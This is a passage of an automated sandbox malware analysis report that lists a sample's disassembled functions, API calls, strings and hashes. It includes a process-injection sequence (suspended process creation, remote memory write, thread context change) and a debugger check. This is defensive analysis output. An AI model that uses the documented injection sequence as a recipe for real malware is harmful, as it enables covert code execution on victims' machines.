                                                                  • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02635938
                                                                  • VirtualAllocEx.KERNEL32(?,00000000,0264BF98,00003000,00000040,02645084), ref: 0263595E
                                                                  • WriteProcessMemory.KERNEL32(?,00000000,?,0264BF98,00000000,?,00000000,0264BF98,00003000,00000040,02645084), ref: 02635978
                                                                  • GetThreadContext.KERNEL32(?,?,?,00000000,?,0264BF98,00000000,?,00000000,0264BF98,00003000,00000040,02645084), ref: 02635997
                                                                  • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,0264BF98,00000000,?,00000000,0264BF98,00003000,00000040,02645084), ref: 026359B2
                                                                  • ResumeThread.KERNEL32(?,?,00000000,?,0264BF98,00000000,?,00000000,0264BF98,00003000,00000040,02645084), ref: 026359D1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                  • String ID: D
                                                                  • API String ID: 2170139861-2746444292
                                                                  • Opcode ID: aeddd0d94e8c347bbaadca76abf855ba324d9b3ab869e140c6fe2a1d0112047c
                                                                  • Instruction ID: 398253231085f9e5bcc7341f5f2feec5a7ad1d435fc0e40347548bb92f9b5013
                                                                  • Opcode Fuzzy Hash: aeddd0d94e8c347bbaadca76abf855ba324d9b3ab869e140c6fe2a1d0112047c
                                                                  • Instruction Fuzzy Hash: 5D4177B4A40348ABE725DB60DC45FAE77B8EF14B00F40459DB64EA72C0DBB0AA848F54
                                                                  Function 6C8F9170 Relevance: 20.0, APIs: 13, Instructions: 459COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,6C8F9007,?,00001000,?,?,6C8DC9EC,?,6C8F9007,?,?,00000000,00000000,FFFFFFF4), ref: 6C8F91D5
                                                                  • WriteConsoleW.KERNEL32(00000008,?,00000000,00000000,00000000,0000FDE9,00000008,?,6C8F9007,?,00001000,?,?,6C8DC9EC,?,6C8F9007), ref: 6C8F9204
                                                                  • WriteConsoleW.KERNEL32(00000008,?,00000001,6C8F9007,00000000,00000008,?,00000000,00000000,00000000,0000FDE9,00000008,?,6C8F9007,?,00001000), ref: 6C8F9254
                                                                  • GetLastError.KERNEL32(00000008,?,00000000,00000000,00000000,0000FDE9,00000008,?,6C8F9007,?,00001000,?,?,6C8DC9EC,?,6C8F9007), ref: 6C8F9463
                                                                  • GetStdHandle.KERNEL32(000000F6,?,6C8F9007,?,6C8DC9EC,6C983DD8,00000000,6C8F9007,00000000,?,6C983D78,6C8DC9EC,00001000,6C983DC8,6C983DB0,6C983DB8), ref: 6C8F9525
                                                                  • GetLastError.KERNEL32(000000F6,?,6C8F9007,?,6C8DC9EC,6C983DD8,00000000,6C8F9007,00000000,?,6C983D78,6C8DC9EC,00001000,6C983DC8,6C983DB0,6C983DB8), ref: 6C8F9533
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleErrorLastWrite$ByteCharHandleMultiWide
                                                                  • String ID:
                                                                  • API String ID: 1103291878-0
                                                                  • Opcode ID: cb9620cf1e38bf8b8ac5f623efb007e1dab64b06ab001c72852a0644d47d6cb1
                                                                  • Instruction ID: c0825a82e9dbf703876cbd64c69d17220af370c696fed949925bf80ace863c1c
                                                                  • Opcode Fuzzy Hash: cb9620cf1e38bf8b8ac5f623efb007e1dab64b06ab001c72852a0644d47d6cb1
                                                                  • Instruction Fuzzy Hash: D5F1BB319153559ADB228F38C8417ABB7B4BFA6384F14CB19F8E4B7A81E730D986C750
                                                                  Function 6C8F0790 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 172filenativesynchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtWriteFile.NTDLL ref: 6C8F07EF
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,00000000,00000103,?,?,00000000,00000000), ref: 6C8F07FE
                                                                  • RtlNtStatusToDosError.NTDLL ref: 6C8F081D
                                                                  • GetConsoleMode.KERNEL32(?,00000000), ref: 6C8F08B3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleErrorFileModeObjectSingleStatusWaitWrite
                                                                  • String ID: -pty$\$\
                                                                  • API String ID: 1126159181-1451992680
                                                                  • Opcode ID: 66065c0461c0d5769333c36c63aaa93c9f2de68e00b23f0a28fb18984d1db98b
                                                                  • Instruction ID: 4fde6108ec69e93c403421c55efb075833ff2e22276eb1d0b695a8fd0478d9a1
                                                                  • Opcode Fuzzy Hash: 66065c0461c0d5769333c36c63aaa93c9f2de68e00b23f0a28fb18984d1db98b
                                                                  • Instruction Fuzzy Hash: 7651A1B1A05308AFE710CF54CD84BDFBBF4AF85358F10452DE868A7380D774A94A8B96
                                                                  Function 6C9469D0 Relevance: 11.0, APIs: 7, Instructions: 494COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: malloc
                                                                  • String ID:
                                                                  • API String ID: 2803490479-0
                                                                  • Opcode ID: ce51ab4f1c2c29a7873d1ca3e9d58189d24f57dfe05f9193a3e02d68419e6229
                                                                  • Instruction ID: e25c24fdc050f5da028893da436af6396b3d3443b3fe9b29aac5918cf787296e
                                                                  • Opcode Fuzzy Hash: ce51ab4f1c2c29a7873d1ca3e9d58189d24f57dfe05f9193a3e02d68419e6229
                                                                  • Instruction Fuzzy Hash: 621258B16097068FC304CF19C48065AB7E6BF88758F55CA2DE899E7B54E730ED09CB92
                                                                  Function 6C86FCE0 Relevance: 10.8, APIs: 7, Instructions: 345COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 6C86FD27
                                                                  • FindFirstVolumeW.KERNEL32(00000000,00000105), ref: 6C86FD35
                                                                  • memcpy.MSVCRT(00000000,00000000,FFFFFFFE,00000000,00000105), ref: 6C86FE3D
                                                                  • FindNextVolumeW.KERNEL32(?,?,00000105,?,?,?,?,00000000,00000105), ref: 6C86FEA7
                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,?), ref: 6C87013B
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: FindVolume$DiskFirstFreeNextSpacememcpymemset
                                                                  • String ID:
                                                                  • API String ID: 478406750-0
                                                                  • Opcode ID: 08419eaad0cd0fe01798cb32864c54f951efd0c9f5deb8dd8abe9b0dd5f3a510
                                                                  • Instruction ID: da7af3e1513c4ec3e87e2c30a22d9fd2d2bef169411a7f9cf8c3a48bc85b7767
                                                                  • Opcode Fuzzy Hash: 08419eaad0cd0fe01798cb32864c54f951efd0c9f5deb8dd8abe9b0dd5f3a510
                                                                  • Instruction Fuzzy Hash: 0BC135B1D002089BDB20CF69DD45BEEB7F4AFA5718F108829E915B7B81E771D904CBA1
                                                                  Function 6C926DC0 Relevance: 10.6, Strings: 8, Instructions: 621COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: +NaNinf00e00E0assertion failed: ndigits > 0$assertion failed: buf.len() >= MAX_SIG_DIGITS$assertion failed: d.mant + d.plus < (1 << 61)$assertion failed: d.mant > 0$assertion failed: d.mant.checked_add(d.plus).is_some()$assertion failed: d.mant.checked_sub(d.minus).is_some()$assertion failed: d.minus > 0$assertion failed: edelta >= 0core\src\num\diy_float.rs
                                                                  • API String ID: 0-3329680326
                                                                  • Opcode ID: b9231439ab1b7a29a3475a3a3590164ae4348f0aa7848132ef20e1b866603136
                                                                  • Instruction ID: d26299cda1a03273a436e9fa9f94d0879db3b98a72d63ca9eab91ebd5e7ece57
                                                                  • Opcode Fuzzy Hash: b9231439ab1b7a29a3475a3a3590164ae4348f0aa7848132ef20e1b866603136
                                                                  • Instruction Fuzzy Hash: 6B325976A183119FC704CF29C88075AFBE2BFC8754F198A2DF899A7755D734E8058B82
                                                                  Function 6C8A7F80 Relevance: 9.9, Strings: 7, Instructions: 1131COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 2-by$expa$expand 3$nd 32-by$te k2-by$te k2-byexpate knd 3$te knd 3expa
                                                                  • API String ID: 0-1772262818
                                                                  • Opcode ID: 1391a8e0975a9adc2b0a8bfe7d6b8fa79609e5bb0249d7250758481f8c467e98
                                                                  • Instruction ID: 08193c45febc1764affb7e7c13b93f0922b3e506d6928dbd7107ffd96ffed1ed
                                                                  • Opcode Fuzzy Hash: 1391a8e0975a9adc2b0a8bfe7d6b8fa79609e5bb0249d7250758481f8c467e98
                                                                  • Instruction Fuzzy Hash: 42E244B0D012288FDB64CFA9C984BCDFBF1BF88314F6581AAD409B7215D7706A968F54
                                                                  Function 6C8598E0 Relevance: 9.9, Strings: 7, Instructions: 1131COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 2-by$expa$expand 3$nd 32-by$te k2-by$te k2-byexpate knd 3$te knd 3expa
                                                                  • API String ID: 0-1772262818
                                                                  • Opcode ID: 1391a8e0975a9adc2b0a8bfe7d6b8fa79609e5bb0249d7250758481f8c467e98
                                                                  • Instruction ID: 7bd5b078ada9131d29cf46fe95bff84206cbbb035bd6f96314bc3281fa213f11
                                                                  • Opcode Fuzzy Hash: 1391a8e0975a9adc2b0a8bfe7d6b8fa79609e5bb0249d7250758481f8c467e98
                                                                  • Instruction Fuzzy Hash: E9E244B0D012288FDB64CFA9C984BCDFBF1BF88314F6581AAD409B7215D7706A968F54
                                                                  Function 6C934E20 Relevance: 9.8, APIs: 5, Strings: 1, Instructions: 773COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • assertion failed: noborrowassertion failed: digits < 40assertion failed: other > 0assertion failed: !d.is_zero()_, xrefs: 6C935777
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID: assertion failed: noborrowassertion failed: digits < 40assertion failed: other > 0assertion failed: !d.is_zero()_
                                                                  • API String ID: 2221118986-1476291318
                                                                  • Opcode ID: fdfebcdd1445896f6ffe852fbbeb34a0f480f87d7c030d5c9626ee6581ae59d3
                                                                  • Instruction ID: 95463f18fbc136902e29b89f8300fe75917613bfabed1e730f5973a0f382047d
                                                                  • Opcode Fuzzy Hash: fdfebcdd1445896f6ffe852fbbeb34a0f480f87d7c030d5c9626ee6581ae59d3
                                                                  • Instruction Fuzzy Hash: B4520471A0122A9FCB14CF58C880BFEB7B5FF9A314F555629E81AAB740D731E945CB80
                                                                  Function 6C89DCB0 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 340COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • assertion failed: t.get().is_null(), xrefs: 6C89E08F
                                                                  • assertion failed: t.get().eq(&(self as *const _)), xrefs: 6C89E042
                                                                  • bdep, xrefs: 6C89DD46
                                                                  • cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs, xrefs: 6C89E031, 6C89E07E
                                                                  • bdep, xrefs: 6C89DD2A
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID: assertion failed: t.get().eq(&(self as *const _))$assertion failed: t.get().is_null()$bdep$bdep$cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs
                                                                  • API String ID: 2221118986-765718192
                                                                  • Opcode ID: e6681d3a80cb5f219b31076d762477da58540607ce93156e616fa04fd8d6f432
                                                                  • Instruction ID: 74ca3ecf78bc054ceda04b7e8512d62be263770a63bf3255148edfc41b83a2f9
                                                                  • Opcode Fuzzy Hash: e6681d3a80cb5f219b31076d762477da58540607ce93156e616fa04fd8d6f432
                                                                  • Instruction Fuzzy Hash: 24D1B276E002199BDB14CFA9C8417EFF7B2BF88314F1A853AD919AB740DB7599018BD0
                                                                  Function 6C9279B0 Relevance: 8.1, APIs: 2, Strings: 3, Instructions: 642COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • assertion failed: !buf.is_empty(), xrefs: 6C927ECE
                                                                  • assertion failed: d.mant > 0, xrefs: 6C927EAC
                                                                  • +NaNinf00e00E0assertion failed: ndigits > 0, xrefs: 6C9279B3
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID: +NaNinf00e00E0assertion failed: ndigits > 0$assertion failed: !buf.is_empty()$assertion failed: d.mant > 0
                                                                  • API String ID: 2221118986-682178742
                                                                  • Opcode ID: dd48bb415d4632f2a2502827cf95a01dc710e429810868cfbe6e14193c015ff1
                                                                  • Instruction ID: 27e8ade65bd75d9956f593a9494461de4bcdea6d245172489579eb845f8e864f
                                                                  • Opcode Fuzzy Hash: dd48bb415d4632f2a2502827cf95a01dc710e429810868cfbe6e14193c015ff1
                                                                  • Instruction Fuzzy Hash: 8132BF72F002198FCB04CE68C890BEEB7F6AF88354F198529E855B7794D634DD45CB90
                                                                  Function 6C929151 Relevance: 7.6, Strings: 6, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: \u$\u${${$}$}
                                                                  • API String ID: 0-582841131
                                                                  • Opcode ID: d3da57ea7b703307df5c21655212a389eca8b0c384bd1c248ce89ad378a3acf4
                                                                  • Instruction ID: 89c63aca11fb62af0b7184bf3f3e09a1aad7d9982c9d6e2d43bcc5e97cdacc70
                                                                  • Opcode Fuzzy Hash: d3da57ea7b703307df5c21655212a389eca8b0c384bd1c248ce89ad378a3acf4
                                                                  • Instruction Fuzzy Hash: 2B511D23D1A7D689E7018BA9441019EFFB29FE6218F1F81AAC8D85F383C375C545C3A5
                                                                  Function 04F9B637 Relevance: 7.6, Strings: 5, Instructions: 1357COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <$D=H=$P=T=$\=`=$h=l=
                                                                  • API String ID: 0-2826345987
                                                                  • Opcode ID: e21aa3b85b6d1a0859432615a01f94d355bf6444aec7a6b552ce61a9105b859b
                                                                  • Instruction ID: 2283775e2d2f26bf4476e4e32568029bcb77b74c2336608899b985933b75e399
                                                                  • Opcode Fuzzy Hash: e21aa3b85b6d1a0859432615a01f94d355bf6444aec7a6b552ce61a9105b859b
                                                                  • Instruction Fuzzy Hash: D8B14331548B485FEF309F3C8848B9A7BE2EF4A310F940A6ED8C9C7156D621E8838757
                                                                  Function 026369D5 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32 ref: 02637A14
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02637A29
                                                                  • UnhandledExceptionFilter.KERNEL32(0264534C), ref: 02637A34
                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 02637A50
                                                                  • TerminateProcess.KERNEL32(00000000), ref: 02637A57
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                  • String ID:
                                                                  • API String ID: 2579439406-0
                                                                  • Opcode ID: 5795cfcf731eb267cbb7516e44067802abd053699606f65c89a3a0d5fa7a0be5
                                                                  • Instruction ID: 06acafe16fcdc753245fec7c5dad4b123b78d3e40a81048a45c73b78f3dc3fe4
                                                                  • Opcode Fuzzy Hash: 5795cfcf731eb267cbb7516e44067802abd053699606f65c89a3a0d5fa7a0be5
                                                                  • Instruction Fuzzy Hash: EC21CFBCCC0204EFE782DFA8E16565C3BE5BB18315F50681AE58987340EB745EE08F04
                                                                  Function 6C873410 Relevance: 6.5, APIs: 2, Strings: 2, Instructions: 477COMMON
                                                                  Download Yara Rule
                                                                  APIs
